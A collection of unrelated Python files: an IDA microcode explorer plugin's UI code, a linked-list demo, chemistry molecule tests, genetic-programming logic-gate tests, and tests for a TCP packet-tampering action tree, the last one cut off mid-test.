def _transfer_cursor(self, mmat_src, mmat_dst):
"""
Translate the cursor position from one maturity to the next.
"""
position = self._view_cursors[mmat_src].viewport_position
mapped = self._view_cursors[mmat_src].mapped
# attempt to translate the position in one mtext to another
projection = translate_mtext_position(position, self._mtext[mmat_src], self._mtext[mmat_dst])
# if translation failed, we will generate an approximate cursor
if not projection:
mapped = False
projection = remap_mtext_position(position, self._mtext[mmat_src], self._mtext[mmat_dst])
# save the generated cursor
line_num, x, y = projection
self._view_cursors[mmat_dst] = ViewCursor(line_num, x, y, mapped)
#----------------------------------------------------------------------
# Callbacks
#----------------------------------------------------------------------
def mtext_refreshed(self, callback):
"""
Subscribe a callback for mtext refresh events.
"""
register_callback(self._mtext_refreshed_callbacks, callback)
def _notify_mtext_refreshed(self):
"""
Notify listeners of a mtext refresh event.
"""
notify_callback(self._mtext_refreshed_callbacks)
def position_changed(self, callback):
"""
Subscribe a callback for cursor position changed events.
"""
register_callback(self._position_changed_callbacks, callback)
def _notify_position_changed(self):
"""
Notify listeners of a cursor position changed event.
"""
notify_callback(self._position_changed_callbacks)
def maturity_changed(self, callback):
"""
Subscribe a callback for maturity changed events.
"""
register_callback(self._maturity_changed_callbacks, callback)
def _notify_maturity_changed(self):
"""
Notify listeners of a maturity changed event.
"""
notify_callback(self._maturity_changed_callbacks)
#-----------------------------------------------------------------------------
# UI Components
#-----------------------------------------------------------------------------
class MicrocodeExplorerView(QtWidgets.QWidget):
"""
The view component of the Microcode Explorer.
"""
WINDOW_TITLE = "Microcode Explorer"
def __init__(self, controller, model):
super(MicrocodeExplorerView, self).__init__()
self.visible = False
# the backing model, and controller for this view (eg, mvc pattern)
self.model = model
self.controller = controller
# initialize the plugin UI
self._ui_init()
self._ui_init_signals()
#--------------------------------------------------------------------------
# Pseudo Widget Functions
#--------------------------------------------------------------------------
def show(self):
self.refresh()
# show the dockable widget
flags = ida_kernwin.PluginForm.WOPN_DP_RIGHT | 0x200 # WOPN_SZHINT
ida_kernwin.display_widget(self._twidget, flags)
ida_kernwin.set_dock_pos(self.WINDOW_TITLE, "IDATopLevelDockArea", ida_kernwin.DP_RIGHT)
self._code_sync.hook()
def _cleanup(self):
self.visible = False
self._twidget = None
self.widget = None
self._code_sync.unhook()
self._ui_hooks.unhook()
# TODO cleanup controller / model
#--------------------------------------------------------------------------
# Initialization - UI
#--------------------------------------------------------------------------
def _ui_init(self):
"""
Initialize UI elements.
"""
self._ui_init_widget()
# initialize our ui elements
self._ui_init_list()
self._ui_init_code()
self._ui_init_settings()
# layout the populated ui just before showing it
self._ui_layout()
def _ui_init_widget(self):
"""
Initialize an IDA widget for this UI control.
"""
# create a dockable widget, and save a reference to it for later use
self._twidget = ida_kernwin.create_empty_widget(self.WINDOW_TITLE)
# cast the IDA 'twidget' to a less opaque QWidget object
self.widget = ida_kernwin.PluginForm.TWidgetToPyQtWidget(self._twidget)
# hooks to help track the container/widget lifetime
class ExplorerUIHooks(ida_kernwin.UI_Hooks):
def widget_invisible(_, twidget):
if twidget == self._twidget:
self.visible = False
self._cleanup()
def widget_visible(_, twidget):
if twidget == self._twidget:
self.visible = True
# install the widget lifetime hooks
self._ui_hooks = ExplorerUIHooks()
self._ui_hooks.hook()
def _ui_init_list(self):
"""
Initialize the microcode maturity list.
"""
self._maturity_list = LayerListWidget()
def _ui_init_code(self):
"""
Initialize the microcode view(s).
"""
self._code_view = MicrocodeView(self.model)
self._code_sync = MicroCursorHighlight(self.controller, self.model)
self._code_sync.track_view(self._code_view.widget)
def _ui_init_settings(self):
"""
Initialize the explorer settings groupbox.
"""
self._checkbox_cursor = QtWidgets.QCheckBox("Highlight mutual")
self._checkbox_cursor.setCheckState(QtCore.Qt.Checked)
self._checkbox_verbose = QtWidgets.QCheckBox("Show use/def")
self._checkbox_sync = QtWidgets.QCheckBox("Sync hexrays")
self._checkbox_sync.setCheckState(QtCore.Qt.Checked)
self._groupbox_settings = QtWidgets.QGroupBox("Settings")
layout = QtWidgets.QVBoxLayout()
layout.addWidget(self._checkbox_cursor)
layout.addWidget(self._checkbox_verbose)
layout.addWidget(self._checkbox_sync)
self._groupbox_settings.setLayout(layout)
def _ui_layout(self):
"""
Layout the major UI elements of the widget.
"""
layout = QtWidgets.QGridLayout()
# arrange the widgets in a 'grid' row col row span col span
layout.addWidget(self._code_view.widget, 0, 0, 0, 1)
layout.addWidget(self._maturity_list, 0, 1, 1, 1)
layout.addWidget(self._groupbox_settings, 1, 1, 1, 1)
# apply the layout to the widget
self.widget.setLayout(layout)
def _ui_init_signals(self):
"""
Connect UI signals.
"""
self._maturity_list.currentItemChanged.connect(lambda x, y: self.controller.select_maturity(x.text()))
self._code_view.connect_signals(self.controller)
self._code_view.OnClose = self.hide # HACK
# checkboxes
self._checkbox_cursor.stateChanged.connect(lambda x: self.controller.set_highlight_mutual(bool(x)))
self._checkbox_verbose.stateChanged.connect(lambda x: self.controller.set_verbose(bool(x)))
self._checkbox_sync.stateChanged.connect(lambda x: self._code_sync.enable_sync(bool(x)))
# model signals
self.model.mtext_refreshed(self.refresh)
self.model.maturity_changed(self.refresh)
#--------------------------------------------------------------------------
# Misc
#--------------------------------------------------------------------------
def refresh(self):
"""
Refresh the microcode explorer UI based on the model state.
"""
self._maturity_list.setCurrentRow(self.model.active_maturity - 1)
self._code_view.refresh()
class LayerListWidget(QtWidgets.QListWidget):
"""
The microcode maturity list widget
"""
def __init__(self):
super(LayerListWidget, self).__init__()
# populate the list widget with the microcode maturity levels
self.addItems([get_mmat_name(x) for x in get_mmat_levels()])
# select the first maturity level, by default
self.setCurrentRow(0)
# make the list widget a fixed size, slightly wider than it needs to be
width = self.sizeHintForColumn(0)
self.setMaximumWidth(int(width + width * 0.10))
def wheelEvent(self, event):
"""
Handle mouse wheel scroll events.
"""
y = event.angleDelta().y()
# scrolling down, clamp to last row
if y < 0:
next_row = min(self.currentRow()+1, self.count()-1)
# scrolling up, clamp to first row (0)
elif y > 0:
next_row = max(self.currentRow()-1, 0)
# horizontal scroll ? nothing to do..
else:
return
self.setCurrentRow(next_row)
class MicrocodeView(ida_kernwin.simplecustviewer_t):
"""
An IDA-based text area that will render the Hex-Rays microcode.
TODO: I'll probably rip this out in the future, as I'll have finer
control over the interaction / implementation if I just roll my own
microcode text widget.
For that reason, excuse its hacky-ness / lack of comments.
"""
def __init__(self, model):
super(MicrocodeView, self).__init__()
self.model = model
self.Create()
def connect_signals(self, controller):
self.controller = controller
self.OnCursorPosChanged = lambda: controller.select_position(*self.GetPos())
self.OnDblClick = lambda _: controller.activate_position(*self.GetPos())
self.model.position_changed(self.refresh_cursor)
def refresh(self):
self.ClearLines()
for line in self.model.mtext.lines:
self.AddLine(line.tagged_text)
self.refresh_cursor()
def refresh_cursor(self):
if not self.model.current_position:
return
self.Jump(*self.model.current_position)
def Create(self):
if not super(MicrocodeView, self).Create(None):
return False
self._twidget = self.GetWidget()
self.widget = ida_kernwin.PluginForm.TWidgetToPyQtWidget(self._twidget)
return True
def OnClose(self):
pass
def OnCursorPosChanged(self):
pass
def OnDblClick(self, shift):
pass
def OnPopup(self, form, popup_handle):
controller = self.controller
#
# so, i'm pretty picky about my UI / interactions. IDA puts items in
# the right click context menus of custom (code) viewers.
#
# these items aren't really relevant (imo) to the microcode viewer,
# so I do some dirty stuff here to filter them out and ensure only
# my items will appear in the context menu.
#
# there's only one right click context item right now, but in the
# future i'm sure there will be more.
#
class FilterMenu(QtCore.QObject):
def __init__(self, qmenu):
super(QtCore.QObject, self).__init__()
self.qmenu = qmenu
def eventFilter(self, obj, event):
if event.type() != QtCore.QEvent.Polish:
return False
for action in self.qmenu.actions():
if action.text() in ["&Font...", "&Synchronize with"]: # lol..
self.qmenu.removeAction(action)
self.qmenu.removeEventFilter(self)
self.qmenu = None
return True
p_qmenu = ctypes.cast(int(popup_handle), ctypes.POINTER(ctypes.c_void_p))[0]
qmenu = sip.wrapinstance(int(p_qmenu), QtWidgets.QMenu)
self.filter = FilterMenu(qmenu)
qmenu.installEventFilter(self.filter)
# only handle right clicks on lines containing micro instructions
ins_token = self.model.mtext.get_ins_for_line(self.model.current_line)
if not ins_token:
return False
class MyHandler(ida_kernwin.action_handler_t):
def activate(self, ctx):
controller.show_subtree(ins_token)
def update(self, ctx):
return ida_kernwin.AST_ENABLE_ALWAYS
# inject the 'View subtree' action into the right click context menu
desc = ida_kernwin.action_desc_t(None, 'View subtree', MyHandler())
ida_kernwin.attach_dynamic_action_to_popup(form, popup_handle, desc, None)
return True
#-----------------------------------------------------------------------------
# Util
#-----------------------------------------------------------------------------
class ViewCursor(object):
"""
TODO
"""
def __init__(self, line_num, x, y, mapped=True):
self.line_num = line_num
self.x = x
self.y = y
self.mapped = mapped
@property
def text_position(self):
return (self.line_num, self.x)
@property
def viewport_position(self):
return (self.line_num, self.x, self.y)
|
39379
|
class Node:
def __init__(self, value, next):
self.value = value
self.next = next
class LinkedList:
def __init__(self):
self.head = None
def add(self, value):
self.head = Node(value, self.head)
def remove(self):
# guard against removing from an empty list
if self.head is None:
return None
to_remove = self.head
self.head = self.head.next
to_remove.next = None
return to_remove.value
def reverse(self):
# classic iterative reversal: walk the list once, redirecting each node's
# next pointer at the previous node
current = self.head
prev = None
while current:
nxt = current.next
current.next = prev
prev = current
current = nxt
self.head = prev
self.print()
def print(self):
current = self.head
while current:
print(current.value, end=" ")
print("->", end = " ")
if not current.next:
print(current.next, end ="\n")
current = current.next
if __name__ == "__main__":
ll = LinkedList()
for i in range(10, 1, -1):
ll.add(i)
ll.print()
ll.reverse()
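# Expected output of the demo above (values 10..2 are prepended, so the list
# prints smallest-first, then reversed):
#   2 -> 3 -> 4 -> 5 -> 6 -> 7 -> 8 -> 9 -> 10 -> None
#   10 -> 9 -> 8 -> 7 -> 6 -> 5 -> 4 -> 3 -> 2 -> None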
|
39400
|
import pytest
from rdkit import Chem
from aizynthfinder.chem import MoleculeException, Molecule
def test_no_input():
with pytest.raises(MoleculeException):
Molecule()
def test_create_with_mol():
rd_mol = Chem.MolFromSmiles("O")
mol = Molecule(rd_mol=rd_mol)
assert mol.smiles == "O"
def test_create_with_smiles():
mol = Molecule(smiles="O")
assert Chem.MolToSmiles(mol.rd_mol) == "O"
def test_inchi():
mol = Molecule(smiles="O")
assert mol.inchi == "InChI=1S/H2O/h1H2"
def test_inchi_key():
mol = Molecule(smiles="O")
assert mol.inchi_key == "<KEY>"
def test_fingerprint():
mol = Molecule(smiles="O")
assert sum(mol.fingerprint(2)) == 1
assert sum(mol.fingerprint(2, 10)) == 1
def test_sanitize():
mol = Molecule(smiles="O", sanitize=True)
assert Chem.MolToSmiles(mol.rd_mol) == "O"
mol = Molecule(smiles="c1ccccc1(C)(C)")
with pytest.raises(MoleculeException):
mol.sanitize()
mol.sanitize(raise_exception=False)
assert mol.smiles == "CC1(C)CCCCC1"
def test_equality():
mol1 = Molecule(smiles="CCCCO")
mol2 = Molecule(smiles="OCCCC")
assert mol1 == mol2
def test_basic_equality():
mol1 = Molecule(smiles="CC[C@@H](C)O") # R-2-butanol
mol2 = Molecule(smiles="CC[C@H](C)O") # S-2-butanol
assert mol1 != mol2
assert mol1.basic_compare(mol2)
def test_has_atom_mapping():
mol1 = Molecule(smiles="CCCCO")
mol2 = Molecule(smiles="C[C:5]CCO")
assert not mol1.has_atom_mapping()
assert mol2.has_atom_mapping()
def test_remove_atom_mapping():
mol = Molecule(smiles="C[C:5]CCO")
assert mol.has_atom_mapping()
mol.remove_atom_mapping()
assert not mol.has_atom_mapping()
|
39425
|
import unittest
import datetime
import genetic
import random
class Node:
Value = None
Left = None
Right = None
def __init__(self, value, left=None, right=None):
self.Value = value
self.Left = left
self.Right = right
def isFunction(self):
return self.Left is not None
def __str__(self):
result = self.Value
if self.isFunction():
result += "([" + str(self.Left) + "]"
if self.Right is not None:
result += ",[" + str(self.Right) + "]"
result += ")"
return result + " "
class Operation:
Func = None
HasLeft = None
HasRight = None
def __init__(self, func, hasLeft, hasRight):
self.Func = func
self.HasLeft = hasLeft
self.HasRight = hasRight
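# The candidate genome is a flat list of Node objects: Node.Left / Node.Right
# hold indexes into that same list, index 0 is the root of the expression
# tree, and only references that point strictly past the current node are
# followed. getUsedIndexes walks the list back-to-front, accumulating the
# reachable indexes for each node, and returns the set reachable from the
# root; anything outside that set is dead code and is blanked out by
# getFitness before evaluation. For example, [Node('NOT', 2), Node('B'),
# Node('A')] uses only indexes {0, 2}; index 1 is unreachable.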
def getUsedIndexes(candidate):
used = {0: [0]}
if candidate[0].isFunction():
for i in reversed(range(len(candidate))):
element = candidate[i]
iUsed = [i]
if element.isFunction():
leftIndex = element.Left
rightIndex = element.Right
if i < leftIndex < len(candidate):
iUsed.extend(used[leftIndex])
if rightIndex is not None:
if i < rightIndex < len(candidate):
iUsed.extend(used[rightIndex])
used[i] = iUsed
return set(used[0])
def getFitness(candidate, geneset, rules):
usedIndexes = getUsedIndexes(candidate)
localCopy = candidate[:]
notUsed = list(set(range(len(candidate))) - usedIndexes)
for i in notUsed:
localCopy[i] = None
fitness = 0
for rule in rules:
if getFitnessForRule(localCopy, rule[0], rule[1], geneset) == rule[2]:
fitness += 1
if fitness == len(rules):
fitness = 1000 - len(usedIndexes)
return fitness
def getFitnessForRule(candidate, a, b, geneset):
if candidate[0].isFunction():
localCopy = candidate[:]
for i in reversed(range(len(localCopy))):
element = localCopy[i]
if element is None:
continue
if element.isFunction():
leftIndex = element.Left
rightIndex = element.Right
left = None
if i < leftIndex < len(localCopy):
left = localCopy[leftIndex].Value
right = None
if rightIndex is not None:
if i < rightIndex < len(localCopy):
right = localCopy[rightIndex].Value
value = element.Value
if isinstance(element.Value, str):
gene = geneset[element.Value]
value = gene.Func(left if left is not None else 0,
right if right is not None else 0)
localCopy[i] = Node(value)
else:
localCopy[i] = Node(geneset[element.Value].Func(a, b))
result = localCopy[0].Value
else:
result = geneset[candidate[0].Value].Func(a, b)
return result
def displayDot(candidate, startTime):
result = createDot(candidate.Genes)
timeDiff = datetime.datetime.now() - startTime
print("%s\nfitness: %i\t%s\t%s" % (";".join(result), candidate.Fitness, str(timeDiff), candidate.Strategy))
def createDot(genes):
dotCommands = []
added = [False for i in range(0, len(genes))]
stack = [0]
haveZeroNode = False
while len(stack) > 0:
index = stack.pop()
if added[index]:
continue
added[index] = True
element = genes[index]
if not element.isFunction():
dotCommands.append(str(index) + " [label=\"" + str(element.Value) + "\"]")
else:
dotCommands.append(str(index) + " [label=\"" + element.Value + "\"]")
leftIndex = element.Left
if index < leftIndex < len(genes):
stack.append(leftIndex)
dotCommands.append(str(leftIndex) + " -> " + str(index))
else:
if not haveZeroNode:
dotCommands.append("zero [label=\"0\"]")
haveZeroNode = True
dotCommands.append("zero -> " + str(index))
rightIndex = element.Right
if rightIndex is not None:
if index < rightIndex < len(genes):
stack.append(rightIndex)
dotCommands.append(str(rightIndex) + " -> " + str(index))
else:
if not haveZeroNode:
dotCommands.append("zero [label=\"0\"]")
haveZeroNode = True
dotCommands.append("zero -> " + str(index))
return dotCommands
def displayRaw(candidate, startTime):
timeDiff = datetime.datetime.now() - startTime
print("%s\t%i\t%s" %
((' '.join(map(str, [str(item) for item in candidate.Genes]))),
candidate.Fitness,
str(timeDiff)))
def mutate(childGenes, fnCreateGene):
childIndexesUsed = list(getUsedIndexes(childGenes))
index = childIndexesUsed[random.randint(0, len(childIndexesUsed) - 1)]
childGenes[index] = fnCreateGene(index, len(childGenes))
def crossover(child, parent):
usedParentIndexes = list(sorted(getUsedIndexes(parent)))
usedChildIndexes = list(getUsedIndexes(child))
if len(usedParentIndexes) == 1 and len(usedChildIndexes) == 1:
# node 0 has no child nodes, just copy it
child[0] = parent[0]
return
while True:
parentIndex = usedParentIndexes[random.randint(0, len(usedParentIndexes) - 1)]
childIndex = usedChildIndexes[random.randint(0, len(usedChildIndexes) - 1)]
if parentIndex != 0 or childIndex != 0:
# don't copy the root to the root
break
unusedChildIndexes = list(sorted(set(range(childIndex, len(child))) - set(usedChildIndexes)))
unusedChildIndexes.insert(0, childIndex)
mappedIndexes = {}
nextIndex = 0
for pIndex in usedParentIndexes:
if pIndex < parentIndex:
continue
if len(unusedChildIndexes) > nextIndex:
mappedIndexes[pIndex] = unusedChildIndexes[nextIndex]
else:
mappedIndexes[pIndex] = len(child) + nextIndex - len(unusedChildIndexes)
nextIndex += 1
for parentIndex in mappedIndexes.keys():
node = parent[parentIndex]
childIndex = mappedIndexes[parentIndex]
childNode = Node(node.Value, node.Left, node.Right)
if childIndex < len(child):
child[childIndex] = childNode
else:
child.append(childNode)
left = node.Left
if left is not None:
childNode.Left = mappedIndexes[left] if left in mappedIndexes else 0
right = node.Right
if right is not None:
childNode.Right = mappedIndexes[right] if right in mappedIndexes else 0
def createGene(index, length, geneset):
keys = list(geneset.keys())
key = keys[random.randint(0, len(keys) - 1)]
op = geneset[key]
left = random.randint(index, length - 1) if op.HasLeft else None
right = random.randint(index, length - 1) if op.HasRight else None
return Node(key, left, right)
class OperationGenerationTests(unittest.TestCase):
geneset = None
@classmethod
def setUpClass(cls):
cls.geneset = {'A': Operation(lambda a, b: a, False, False),
'B': Operation(lambda a, b: b, False, False),
'AND': Operation(lambda a, b: a & b, True, True),
'NOT': Operation(lambda a, b: a == 0, True, False)}
def test_generate_OR(self):
minNodes = 6 # not( and( not(a), not(b)))
rules = [[0, 0, 0], [0, 1, 1], [1, 0, 1], [1, 1, 1]]
maxNodes = 20
optimalValue = 1000 - minNodes
startTime = datetime.datetime.now()
fnDisplay = lambda candidate: displayDot(candidate, startTime)
fnGetFitness = lambda candidate: getFitness(candidate, self.geneset, rules)
fnCreateGene = lambda index, length: createGene(index, length, self.geneset)
fnMutate = lambda child: mutate(child, fnCreateGene)
best = genetic.getBest(fnGetFitness, fnDisplay, minNodes, optimalValue, createGene=fnCreateGene,
maxLen=maxNodes, customMutate=fnMutate, customCrossover=crossover)
self.assertTrue(best.Fitness >= optimalValue)
def test_generate_XOR(self):
minNodes = 9 # and( not( and(a, b)), not( and( not(a), not(b))))
rules = [[0, 0, 0], [0, 1, 1], [1, 0, 1], [1, 1, 0]]
maxNodes = 50
optimalValue = 1000 - minNodes
startTime = datetime.datetime.now()
fnDisplay = lambda candidate: displayDot(candidate, startTime)
fnGetFitness = lambda candidate: getFitness(candidate, self.geneset, rules)
fnCreateGene = lambda index, length: createGene(index, length, self.geneset)
fnMutate = lambda child: mutate(child, fnCreateGene)
best = genetic.getBest(fnGetFitness, fnDisplay, minNodes, optimalValue, createGene=fnCreateGene,
maxLen=maxNodes, customMutate=fnMutate, customCrossover=crossover)
self.assertTrue(best.Fitness >= optimalValue)
def test_generate_XOR_with_addition(self):
minNodes = 5 # and( 1, +(a, b))
geneset = {'A': Operation(lambda a, b: a, False, False),
'B': Operation(lambda a, b: b, False, False),
'AND': Operation(lambda a, b: a & b, True, True),
'NOT': Operation(lambda a, b: a == 0, True, False),
'+': Operation(lambda a, b: a + b, True, True),
'1': Operation(lambda a, b: 1, False, False)}
rules = [[0, 0, 0], [0, 1, 1], [1, 0, 1], [1, 1, 0]]
maxNodes = 50
optimalValue = 1000 - minNodes
startTime = datetime.datetime.now()
fnDisplay = lambda candidate: displayDot(candidate, startTime)
fnGetFitness = lambda candidate: getFitness(candidate, geneset, rules)
fnCreateGene = lambda index, length: createGene(index, length, geneset)
fnMutate = lambda child: mutate(child, fnCreateGene)
best = genetic.getBest(fnGetFitness, fnDisplay, minNodes, optimalValue, createGene=fnCreateGene,
maxLen=maxNodes, customMutate=fnMutate, customCrossover=crossover)
self.assertTrue(best.Fitness >= optimalValue)
def test_getFitness_given_base_node_is_A_and_1_matching_rule_should_return_1(self):
rules = [[0, 0, 0], [0, 1, 1]]
genes = [Node('A')]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1)
def test_getFitness_given_base_node_is_B_and_1st_2_rules_match_should_return_2(self):
rules = [[0, 0, 0], [0, 1, 1], [1, 0, 1]]
genes = [Node('B')]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 2)
def test_getFitness_given_base_node_is_NOT_with_Left_node_out_of_bounds_and_1st_rule_matches_should_return_1(self):
rules = [[1, 1, 1], [0, 0, 0]]
genes = [Node('NOT', 100, 0)]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1)
def test_getFitness_given_base_node_is_NOT_with_Left_node_A_and_2nd_rule_matches_should_return_1(self):
rules = [[0, 0, 0], [1, 1, 1]]
genes = [Node('NOT', 100, 0)]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1)
def test_getFitness_given_base_node_is_AND_with_both_nodes_out_of_bounds_and_0_matching_rules_should_return_0(self):
rules = [[1, 0, 1]]
genes = [Node('AND', 100, 100)]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 0)
def test_getFitness_given_all_rules_pass_and_1_gene_should_return_1000_minus_1(self):
rules = [[0, 0, 0]]
genes = [Node('AND', 100, 100)]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1000 - len(genes))
def test_getFitness_given_all_rules_pass_and_2_genes_but_only_1_used_should_return_1000_minus_1(self):
rules = [[0, 0, 0]]
genes = [Node('AND', 100, 100), Node('B')]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1000 - 1)
def test_getFitness_given_all_rules_pass_and_3_genes_but_only_2_used_should_return_1000_minus_2(self):
rules = [[0, 0, 0]]
genes = [Node('AND', 2, 100), Node('AND', 2, 2), Node('B')]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1000 - 2)
def test_getFitness_given_all_rules_pass_with_NOT_2_NOT_1_NOT_2_B_A_should_return_1000_minus_2(self):
rules = [[0, 0, 0]]
genes = [Node('NOT', 2), Node('NOT', 1), Node('NOT', 2), Node('B'), Node('A')]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1000 - 2)
def test_getFitness_given_rules_and_genes_for_XOR_should_get_1000_minus_9(self):
rules = [[0, 0, 0], [0, 1, 1], [1, 0, 1], [1, 1, 0]]
# and( not( and(a, b)), not( and( not(a), not(b))))
genes = [Node('AND', 1, 2), Node('NOT', 3), Node('NOT', 4), Node('AND', 5, 6), Node('AND', 7, 8),
Node('NOT', 7), Node('NOT', 8), Node('A'), Node('B')]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1000 - 9)
if __name__ == '__main__':
unittest.main()
|
39444
|
import logging
import os
from scapy.all import IP, TCP
import actions.tree
import actions.drop
import actions.tamper
import actions.duplicate
import actions.utils
import actions.action
import actions.trigger
import layers.packet
def test_init():
"""
Tests initialization
"""
print(actions.action.Action.get_actions("out"))
def test_count_leaves():
"""
Tests leaf count is correct.
"""
a = actions.tree.ActionTree("out")
logger = logging.getLogger("test")
assert not a.parse("TCP:reserved:0tamper{TCP:flags:replace:S}-|", logger), "Tree parsed malformed DNA"
a.parse("[TCP:reserved:0]-tamper{TCP:flags:replace:S}-|", logger)
duplicate = actions.duplicate.DuplicateAction()
duplicate2 = actions.duplicate.DuplicateAction()
drop = actions.drop.DropAction()
assert a.count_leaves() == 1
assert a.remove_one()
a.add_action(duplicate)
assert a.count_leaves() == 1
duplicate.left = duplicate2
assert a.count_leaves() == 1
duplicate.right = drop
assert a.count_leaves() == 2
def test_check():
"""
Tests action tree check function.
"""
a = actions.tree.ActionTree("out")
logger = logging.getLogger("test")
a.parse("[TCP:flags:RA]-tamper{TCP:flags:replace:S}-|", logger)
p = layers.packet.Packet(IP()/TCP(flags="A"))
assert not a.check(p, logger)
p = layers.packet.Packet(IP(ttl=64)/TCP(flags="RA"))
assert a.check(p, logger)
assert a.remove_one()
assert a.check(p, logger)
a.parse("[TCP:reserved:0]-tamper{TCP:flags:replace:S}-|", logger)
assert a.check(p, logger)
a.parse("[IP:ttl:64]-tamper{TCP:flags:replace:S}-|", logger)
assert a.check(p, logger)
p = layers.packet.Packet(IP(ttl=15)/TCP(flags="RA"))
assert not a.check(p, logger)
def test_scapy():
"""
Tests misc. scapy aspects relevant to strategies.
"""
a = actions.tree.ActionTree("out")
logger = logging.getLogger("test")
a.parse("[TCP:reserved:0]-tamper{TCP:flags:replace:S}-|", logger)
p = layers.packet.Packet(IP()/TCP(flags="A"))
assert a.check(p, logger)
packets = a.run(p, logger)
assert packets[0][TCP].flags == "S"
p = layers.packet.Packet(IP()/TCP(flags="A"))
assert a.check(p, logger)
a.parse("[TCP:reserved:0]-tamper{TCP:chksum:corrupt}-|", logger)
packets = a.run(p, logger)
assert packets[0][TCP].chksum
assert a.check(p, logger)
def test_str():
"""
Tests string representation.
"""
logger = logging.getLogger("test")
t = actions.trigger.Trigger("field", "flags", "TCP")
a = actions.tree.ActionTree("out", trigger=t)
assert str(a).strip() == "[%s]-|" % str(t)
tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
assert a.add_action(tamper)
assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}-|"
# Tree will not add a duplicate action
assert not a.add_action(tamper)
assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}-|"
assert a.add_action(tamper2)
assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R},)-|"
assert a.add_action(actions.duplicate.DuplicateAction())
assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R}(duplicate,),)-|"
drop = actions.drop.DropAction()
assert a.add_action(drop)
assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R}(duplicate(drop,),),)-|" or \
str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R}(duplicate(,drop),),)-|"
assert a.remove_action(drop)
assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R}(duplicate,),)-|"
# Cannot remove action that is not present
assert not a.remove_action(drop)
assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R}(duplicate,),)-|"
a = actions.tree.ActionTree("out", trigger=t)
orig = "[TCP:urgptr:15963]-duplicate(,drop)-|"
a.parse(orig, logger)
assert a.remove_one()
assert orig != str(a)
assert str(a) in ["[TCP:urgptr:15963]-drop-|", "[TCP:urgptr:15963]-duplicate-|"]
def test_pretty_print_send():
t = actions.trigger.Trigger("field", "flags", "TCP")
a = actions.tree.ActionTree("out", trigger=t)
duplicate = actions.duplicate.DuplicateAction()
a.add_action(duplicate)
correct_string = "TCP:flags:0\nduplicate\n├── ===> \n└── ===> "
assert a.pretty_print() == correct_string
def test_pretty_print(logger):
"""
Print complex tree, although difficult to test
"""
t = actions.trigger.Trigger("field", "flags", "TCP")
a = actions.tree.ActionTree("out", trigger=t)
tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
duplicate = actions.duplicate.DuplicateAction()
duplicate2 = actions.duplicate.DuplicateAction()
duplicate3 = actions.duplicate.DuplicateAction()
duplicate4 = actions.duplicate.DuplicateAction()
duplicate5 = actions.duplicate.DuplicateAction()
drop = actions.drop.DropAction()
drop2 = actions.drop.DropAction()
drop3 = actions.drop.DropAction()
drop4 = actions.drop.DropAction()
duplicate.left = duplicate2
duplicate.right = duplicate3
duplicate2.left = tamper
duplicate2.right = drop
duplicate3.left = duplicate4
duplicate3.right = drop2
duplicate4.left = duplicate5
duplicate4.right = drop3
duplicate5.left = drop4
duplicate5.right = tamper2
a.add_action(duplicate)
correct_string = "TCP:flags:0\nduplicate\n├── duplicate\n│ ├── tamper{TCP:flags:replace:S}\n│ │ └── ===> \n│ └── drop\n└── duplicate\n ├── duplicate\n │ ├── duplicate\n │ │ ├── drop\n │ │ └── tamper{TCP:flags:replace:R}\n │ │ └── ===> \n │ └── drop\n └── drop"
assert a.pretty_print() == correct_string
assert a.pretty_print(visual=True)
assert os.path.exists("tree.png")
os.remove("tree.png")
a.parse("[TCP:flags:0]-|", logger)
a.pretty_print(visual=True) # Empty action tree
assert not os.path.exists("tree.png")
def test_pretty_print_order():
"""
Tests the left/right ordering by reading in a new tree
"""
logger = logging.getLogger("test")
a = actions.tree.ActionTree("out")
assert a.parse("[TCP:flags:A]-duplicate(tamper{TCP:flags:replace:R}(tamper{TCP:chksum:replace:14239},),duplicate(tamper{TCP:flags:replace:S}(tamper{TCP:chksum:replace:14239},),))-|", logger)
correct_pretty_print = "TCP:flags:A\nduplicate\n├── tamper{TCP:flags:replace:R}\n│ └── tamper{TCP:chksum:replace:14239}\n│ └── ===> \n└── duplicate\n ├── tamper{TCP:flags:replace:S}\n │ └── tamper{TCP:chksum:replace:14239}\n │ └── ===> \n └── ===> "
assert a.pretty_print() == correct_pretty_print
def test_parse():
"""
Tests string parsing.
"""
logger = logging.getLogger("test")
t = actions.trigger.Trigger("field", "flags", "TCP")
a = actions.tree.ActionTree("out", trigger=t)
base_t = actions.trigger.Trigger("field", "flags", "TCP")
base_a = actions.tree.ActionTree("out", trigger=base_t)
tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
tamper3 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper4 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
a.parse("[TCP:flags:0]-|", logger)
assert str(a) == str(base_a)
assert len(a) == 0
base_a.add_action(tamper)
assert a.parse("[TCP:flags:0]-tamper{TCP:flags:replace:S}-|", logger)
